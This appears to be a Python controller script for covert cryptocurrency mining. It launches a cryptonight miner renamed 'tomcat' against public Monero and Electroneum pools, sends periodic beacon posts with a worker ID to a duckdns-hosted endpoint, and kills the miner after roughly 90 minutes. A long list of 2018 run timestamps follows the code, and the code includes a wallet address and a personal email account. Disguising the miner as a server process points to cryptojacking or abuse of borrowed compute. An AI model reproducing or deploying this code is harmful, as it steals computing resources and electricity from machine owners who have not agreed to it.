import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:14:03.601472
#2018-02-17 16:02:04.778534
#2018-02-17 17:48:03.398061
#2018-02-17 19:36:01.324594
#2018-02-17 21:24:06.047785
#2018-02-17 23:08:01.472834
#2018-02-18 00:55:06.950087
#2018-02-18 02:43:07.356520
#2018-02-18 04:31:06.314356
#2018-02-18 06:22:05.462870
#2018-02-18 08:12:05.414661
#2018-02-18 09:59:05.528420
#2018-02-18 11:46:06.754696
#2018-02-18 13:30:05.669024
#2018-02-18 15:20:03.213202
#2018-02-18 17:09:05.246375
#2018-02-18 18:57:03.764781
#2018-02-18 20:44:01.611920
#2018-02-18 22:29:01.408976
#2018-02-19 00:18:04.299199
#2018-02-19 02:04:07.140008
#2018-02-19 03:51:01.354160
#2018-02-19 05:35:07.679330
#2018-02-19 07:23:01.828545
#2018-02-19 09:13:07.041943
#2018-02-19 11:03:03.795317
#2018-02-19 12:49:10.109648
#2018-02-19 14:38:07.853236
#2018-02-19 16:26:04.853761
#2018-02-19 18:12:07.275203
#2018-02-19 20:00:01.845589
#2018-02-19 21:49:05.400846
#2018-02-19 23:34:06.877099
#2018-02-20 01:19:06.179703
#2018-02-20 03:09:01.292255
#2018-02-20 04:56:01.762825
#2018-02-20 06:40:03.510180
#2018-02-20 08:25:01.664950
#2018-02-20 10:10:09.848612
#2018-02-20 11:54:06.767888
#2018-02-20 13:41:09.667824
#2018-02-20 15:26:01.957049
#2018-02-20 17:11:06.738207
#2018-02-20 18:59:08.373193
#2018-02-20 20:50:01.892873
#2018-02-20 22:34:07.702964
#2018-02-21 00:15:06.165669
#2018-02-21 02:03:02.185005
#2018-02-21 03:50:10.017121
#2018-02-21 05:39:04.540614
#2018-02-21 07:27:03.974601
#2018-02-21 09:12:06.452761
#2018-02-21 11:00:13.605758
#2018-02-21 12:47:04.823848
#2018-02-21 14:35:07.656259
#2018-02-21 16:23:07.450192
#2018-02-21 18:14:04.106256
#2018-02-21 20:00:09.596496
#2018-02-21 21:48:07.851467
#2018-02-21 23:38:05.602831
#2018-02-22 01:27:02.154693
#2018-02-22 04:29:05.150942
#2018-02-22 06:14:07.274672
#2018-02-22 07:59:06.378747
#2018-02-22 09:48:06.575964
#2018-02-22 11:34:05.020105
#2018-02-22 13:21:01.784606
#2018-02-22 15:10:08.918068
#2018-02-22 16:53:07.628741
#2018-02-22 18:42:09.104748
#2018-02-22 20:34:05.690381
#2018-02-22 22:19:07.737441
#2018-02-23 00:05:03.046975
#2018-02-23 01:52:05.943347
#2018-02-23 03:41:01.223050
#2018-02-23 05:25:09.867250
#2018-02-23 07:11:05.475525
#2018-02-23 09:16:09.001172
#2018-02-23 11:23:01.463449
#2018-02-23 13:13:01.723617
#2018-02-23 14:58:05.055011
#2018-02-23 16:48:09.535880
#2018-02-23 18:30:09.604667
#2018-02-23 20:14:01.851082
#2018-02-23 22:03:02.071145
#2018-02-23 23:51:05.598333
#2018-02-24 01:41:07.264503
#2018-02-24 03:32:05.407382
#2018-02-24 05:16:02.179256
#2018-02-24 07:04:06.188022
#2018-02-24 08:51:07.402026
#2018-02-24 11:17:04.152319
#2018-02-24 13:06:05.686177
#2018-02-24 14:58:01.913726
#2018-02-24 16:48:02.086238
#2018-02-24 18:36:05.759240
#2018-02-24 20:24:07.490342
#2018-02-24 22:20:03.624621
#2018-02-25 02:29:04.991851
#2018-02-25 06:09:05.118126
#2018-02-25 11:38:06.259044